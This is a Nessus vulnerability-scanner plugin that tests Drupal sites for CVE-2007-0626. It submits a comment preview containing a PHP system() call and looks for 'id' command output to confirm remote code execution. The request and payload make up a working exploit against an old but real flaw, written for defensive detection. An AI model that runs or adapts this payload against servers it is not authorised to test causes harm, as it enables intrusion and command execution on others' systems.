#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains a PHP application that allows execution
of arbitrary code. 

Description :

The version of Drupal installed on the remote host fails to properly
validate previews on comments and allows access to more than one input
filter, which is not true by default.  An attacker can leverage this
issue while previewing a comment to have it interpreted as PHP code,
which will result in it being executed on the affected host with the
privileges of the web server user id. 

See also :

http://drupal.org/node/113935

Solution :

Upgrade to Drupal version 4.7.6 / 5.1 or later. 

Risk factor : 

Medium / CVSS Base Score : 5.1
(CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P)";


if (description)
{
  script_id(24266);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-0626");
  script_bugtraq_id(22306);
  script_xref(name:"OSVDB", value:"32136");

  script_name(english:"Drupal Comment Preview Code Execution Vulnerability (2)");
  script_summary(english:"Tries to execute a command via Drupal");
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security");

  script_dependencies("drupal_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Test an install.
install = get_kb_item(string("www/", port, "/drupal"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches))
{
  dir = matches[2];

  # First we need a posting id.
  res = http_get_cache(item:string(dir, "/index.php"), port:port);
  if (res == NULL) exit(0);

  pat = string('<a href="(', dir, '/\\?q=|', dir, '/)?comment/reply/([0-9]+)');
  matches = egrep(pattern:pat, string:res);
  pid = NULL;
  if (matches) 
  {
    foreach match (split(matches)) 
    {
      match = chomp(match);
      subpats = eregmatch(pattern:pat, string:match);
      if (!isnull(subpats))
      {
        pid = subpats[2];
        break;
      }
    }
  }

  # If we have one...
  if (!isnull(pid))
  {
    # Pull up the form.
    url = string(dir, "/?q=comment/reply/", pid, "#comment_form");
    req = http_get(item:url, port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    # Grab the form token.
    pat = 'name="edit[form_token]"[^>]* value="([^"]+)"';
    matches = egrep(pattern:pat, string:res);
    token = NULL;
    if (matches) 
    {
      foreach match (split(matches)) 
      {
        match = chomp(match);
        subpats = eregmatch(pattern:pat, string:match);
        if (!isnull(subpats))
        {
          token = subpats[1];
          break;
        }
      }
    }
    if (isnull(token)) token = "e7a9fc015e16fc6d493bf1692b7c28e8";

    # Make sure multiple input filters are allowed but PHP code is not.
    if (
      ' name="edit[format]" value="' >< res &&
      # nb: this string is hardcoded in filter.module and appears
      #     regardless of the filter name as long as PHP code is
      #     supported by the filter.
      "You may post PHP code." >!< res
    )
    {
      # Try to run a command.
      cmd = "id";
      postdata = string(
        "edit[subject]=Nessus&",
        "edit[comment]=", urlencode(str:string("<?php system(", cmd, "); ?>")), "&",
        # nb: 2 => evaluate as PHP code.
        "edit[format]=2&",
        "edit[form_token]=", token, "&",
        "edit[form_id]=comment_form&",
        "op=Preview+comment"
      );
      req = string(
        "POST ", url, " HTTP/1.1\r\n",
        "Host: ", get_host_name(), "\r\n",
        "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n",
        "Content-Length: ", strlen(postdata), "\r\n",
        "\r\n",
        postdata
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
      if (res == NULL) exit(0);

     # There's a problem if we see the code in the output.
      line = egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string:res);
      if (line)
      {
        if ('class="content">' >< line) line = strstr(line, "uid=");
        if ("</div" >< line) line = line - "</div>";

        report = string(
          desc,
          "\n\n",
          "Plugin output :\n",
          "\n",
          "Nessus was able to execute the command '", cmd, "' on the remote host.\n",
          "It produced the following output :\n",
          "\n",
          "  ", line
        );

        security_warning(port:port, data:report);
        exit(0);
      }
    }
    else if ("You may post PHP code." >< res)
    {
      if (log_verbosity > 1) debug_print("skipped because PHP code in comments is already supported!", level:0);
    }
  }
}
